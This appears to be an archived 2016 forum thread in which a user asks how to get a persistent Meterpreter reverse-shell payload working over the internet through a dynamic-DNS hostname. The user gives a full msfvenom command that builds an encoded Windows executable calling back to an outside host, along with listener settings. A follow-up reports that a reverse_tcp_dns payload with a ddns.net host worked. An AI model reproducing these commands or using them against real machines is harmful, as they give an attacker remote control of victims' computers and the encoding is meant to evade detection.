PDA

View Full Version : How can I create a persistence payload over WAN

TitoOP
2016-10-18, 14:57
So I want to be able to create a persistence payload over WAN, the problem with that ofcourse is that the public ip address gets updated like everyday (at least mine does);
so I tried to create a hostname on no-ip, and when creating the payload I used this command:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=<MYHOSTNAMEONNO-IP> LPORT=4444 <and yes I already portforwarded that> -f exe > payload.exe
and then on the listener I set the LHOST to that hostname and then set ReverseLisnterBindAddress to 192.168.1.10 <my internal ip address;
which the port is being forwarded to> and after I entered exploit and then launched the payload nothing happened, so I tried to just set the LHOST to the HOSTNAME and unset the ReverseListenerBindAddress so it started the handler on 127.0.0.1:4444;
after that I tried to open the payload but that didnt work either; Finally I tried setting the LHOST to 192.168.1.10 and unset the ReverseListenerBindAddress and launch the payload but again, nothing happened.

Any suggestions on what I could do?
-thanks!

TitoOP
2016-10-18, 15:58
I found a solution, instead of using the windows/meterpreter/reverse_tcp payload I used reverse_tcp_dns and changed the host on noip to use ddns.net and in the listener I set the lhost to my internal ip address and it worked!